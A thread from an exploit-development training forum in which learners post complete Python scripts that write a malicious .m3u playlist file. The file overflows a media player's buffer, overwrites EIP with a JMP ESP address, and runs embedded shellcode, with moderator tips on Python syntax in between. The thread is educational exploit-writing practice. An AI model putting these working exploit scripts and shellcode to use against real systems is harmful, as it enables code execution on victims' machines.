Log In
Register
Semisecure Login is not enabled!
Please enable JavaScript and use a modern browser to ensure that your password is encrypted.
Home
Topic RSS
Related Topics
21:52
Newbie
June 21, 2011
Offline
I've been reading through the exploit writing tutorials here for a bit, and I've run into an issue that I was wondering if someone could help me with. I've been following along writing in python rather than perl, so I've been translating the code as I go. It was working out perfectly fine until I reached one spot. I've come to the point where I have an address in memory to overwrite EIP with to give the program a JMP esp command, but the program does not appear to be overwriting EIP with the correct address. I know I am writing to the correct location, because if I replace the memory address with 'BBBB', EIP is overwritten with '42424242' (when they are the only B's in the file).
I investigated to see if I was using the struct.pack() method in python in a way that it functioned differently from perl's pack() function. As far as I can tell, I'm using it right. I equated "pack('V', 0x<address>)" to "struct.pack('<L', 0x<address>)". If I am not mistaken, these two should yield the same results, as 'V' and '<L' stand for little-endian unsigned long in their respective languages.
As a few final pieces of information on my problem, I am trying to use the address '01a8f23a' and EIP ends up overwritten with '000FFD4E'. When I run the program, it does indeed crash, but it does not execute the shellcode, presumably because of the wrong data being in EIP.
EDIT: Shortly after posting this, I realized that the value stored in EIP was just a little bit larger than the address of ESP, so I added 25
NOPs to the beginning of my shellcode and it worked fine. Sorry for the trouble.
My full code:
import struct
Fuzzed = open('C:Documents and SettingsOwnerDesktopFuzzed.m3u','w')
Fuzzed.write('A' * 26072)
string = struct.pack('<L',0x01a8f23a)
Fuzzed.write(string)
Fuzzed.write('XXXX')
shellcode = "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1
x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30
x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa
x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96
x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b
xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a
xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83
x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98
xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61
xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05
x7fxe8x7bxca"
Fuzzed.write(shellcode)
07:16
Moderator
September 7, 2008
Offline
ah cool – thanks for the feedback and update !
glad to see you got it to work
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
20:09
Newbie
April 17, 2012
Offline
Can anyone expand a bit on how to accomplish the same in Python 3.x (3.2)? I'm having difficulty sending the EIP address in '\x41\x41\x41\x41' format. I have done a bit of search and found something regarding encoding differently. Is there a way to still send the EIP address correctly in Python 3?
07:23
Moderator
September 7, 2008
Offline
stay away from python 3 – there's no reason not to use python 2
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
20:33
Newbie
July 17, 2012
Offline
@burnfile i get error "EOL while scanning scanning string literal" and if i use """ for storing shellcode in variable program executes without any error but the calcutor doesnt spawn this must b because it stores the string as we provide it incuding return character "\n"
#error code
import struct
fob=open('exploit.m3u','w')
a="\x41"*26069
#eip="\x3a\xf2\xa8\x01"
eip=struct.pack('<L',0x01a8f23a)
a+=eip
a+="\x90"*25
shellcode = """xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1
x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30
x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa
x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96
x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b
xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a
xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83
x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98
xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61
xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05
x7fxe8x7bxca"""
a+=shellcode
fob.write(a)
fob.close()
i tried earlier which had all the shellcode in just one line it worked well but if the shellcode is to long it is not possible to accumulate in one line so can u plz help me with such stupid problem..!!!
this is the code which worked
import struct
fob=open('exploit.m3u','w')
a="\x41"*26069
#eip="\x3a\xf2\xa8\x01"
eip=struct.pack('<L',0x01a8f23a)
a+=eip
a+="\x90"*25
shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
a+=shellcode
fob.write(a)
fob.close()
the shellcode string is whole one line
20:16
Moderator
September 7, 2008
Offline
in python, you can put shellcode on multiple lines by wrapping it inside round brackets:
shellcode = ("\x01\x02\x03\x04"
"\x05\x06\x07"
"\x08\x09\x10"
"\x11\x12")
Corelan Live Win32 Exploit Development Bootcamp http://www.corelan-training.com/
Most Users Ever Online: 91
Currently Online: cihatix, Un0wn_X
11 Guest(s)
Currently Browsing this Page:
1 Guest(s)
Top Posters:
mr_me: 313
Lincoln: 198
rick2600: 181
redsees: 179
Member Stats:
Guest Posters: 1
Members: 11594
Moderators: 1
Admins: 1
Forum Stats:
Groups: 3
Forums: 54
Topics: 989
Posts: 6265
Newest Members: Digitalspecops, RoninK9, topchau, lucaschau
Moderators: Peter Van Eeckhoutte (2942)
Administrators: Peter Van Eeckhoutte (2942)
